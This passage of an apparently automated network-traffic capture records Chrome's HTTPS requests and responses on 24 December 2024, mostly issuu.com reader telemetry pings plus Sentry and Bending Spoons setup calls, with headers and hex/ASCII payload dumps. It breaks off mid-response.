                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:26 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.44976734.120.195.2494435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:26 UTC499OUTGET /api/4506104688082944/envelope/?sentry_key=20169667e5c7bfec02249a8341e145fa&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.108.0 HTTP/1.1
                                                                                                          Host: o4505883345354752.ingest.sentry.io
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:26 UTC290INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:56:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 548
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-24 19:56:26 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.44977335.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:28 UTC654OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 2687
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:28 UTC2687OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2d 64 6f 63 75 6d 65 6e 74 2d 6d 65 74 61 2d 6c 6f 61 64 65 64 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 72 65 61 64 65 72 43 6f 6e 66 69 67 22 3a 22 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 22 7d 7d 2c 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3-document-meta-loaded","attributes":{"readerConfig":"sharable-fullscreen"}},{"version":"1.
                                                                                                          2024-12-24 19:56:29 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:29 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.44977635.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:28 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 665
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:28 UTC665OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:29 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:29 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.44977435.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:28 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 911
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:28 UTC911OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2d 66 65 61 74 75 72 65 73 2e 50 4f 52 54 52 41 49 54 5f 4d 4f 44 45 22 2c 22 6f 70 70 6f 72 74 75 6e 69 74 79 22 3a 31 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 72 65 61 64 65 72 43 6f 6e 66 69 67 22 3a 22 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3-features.PORTRAIT_MODE","opportunity":1,"attributes":{"readerConfig":"sharable-fullscreen
                                                                                                          2024-12-24 19:56:29 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:29 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.44977535.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:28 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 679
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:28 UTC679OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:29 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:29 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.44978235.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:30 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:30 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:30 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:30 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.44978335.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:30 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 399
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:30 UTC399OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2e 6c 69 6e 6b 73 5f 61 70 69 22 2c 22 73 75 63 63 65 73 73 22 3a 31 2c 22 73 75 63 63 65 73 73 5f 74 69 6d 65 22 3a 32 35 36 39 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 72 65 61 64 65 72 43 6f 6e 66 69 67 22 3a 22 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3.links_api","success":1,"success_time":2569,"attributes":{"readerConfig":"sharable-fullscr
                                                                                                          2024-12-24 19:56:31 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:31 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.44979135.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:33 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 681
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:33 UTC681OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 72 65 61 64 65 72 33 2d 76 32 2e 30 2e 37 32 33 5f 73 68 61 72 61 62 6c 65 2d 66 75 6c 6c 73 63 72 65 65 6e 2d 76 31 2e 30 2e 37 32 33 5f 74 72 61 63 6b 69 6e 67 2d 62 75 69 6c 64 69 6e 22 2c 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 22 2c 22 64 61 74 61 22 3a 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 33 2e 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 6e 75 6c 6c 2c 22 75 69 5f 6c 61 6e 67 75 61 67 65 22 3a 22 65 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 69 73 73 75 75 2e 63 6f 6d 2f 74 78 62 63 74 2e 63 6f 6d
                                                                                                          Data Ascii: {"version":"2.2.0","origin":"reader3-v2.0.723_sharable-fullscreen-v1.0.723_tracking-buildin","iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"reader","data":{"version":"1.3.3","username":null,"ui_language":"en","location":"https://issuu.com/txbct.com
                                                                                                          2024-12-24 19:56:33 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-max-age: 86400
                                                                                                          Content-Length: 0
                                                                                                          Date: Tue, 24 Dec 2024 19:56:33 GMT
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.44979334.36.49.684435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:34 UTC585OUTOPTIONS /v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0 HTTP/1.1
                                                                                                          Host: spidersense.bendingspoons.com
                                                                                                          Connection: keep-alive
                                                                                                          Accept: */*
                                                                                                          Access-Control-Request-Method: GET
                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                          Origin: https://issuu.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:34 UTC434INHTTP/1.1 200 OK
                                                                                                          date: Tue, 24 Dec 2024 19:56:26 GMT
                                                                                                          server: istio-envoy
                                                                                                          vary: Origin
                                                                                                          access-control-allow-methods: GET
                                                                                                          access-control-max-age: 600
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          access-control-allow-headers: content-type
                                                                                                          Content-Length: 2
                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                          x-envoy-upstream-service-time: 3
                                                                                                          via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-24 19:56:34 UTC2INData Raw: 4f 4b
                                                                                                          Data Ascii: OK


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.44979534.36.49.684435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:36 UTC661OUTGET /v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0 HTTP/1.1
                                                                                                          Host: spidersense.bendingspoons.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: application/json
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:36 UTC288INHTTP/1.1 200 OK
                                                                                                          date: Tue, 24 Dec 2024 19:56:22 GMT
                                                                                                          server: istio-envoy
                                                                                                          Content-Length: 119
                                                                                                          access-control-allow-origin: https://issuu.com
                                                                                                          vary: Origin
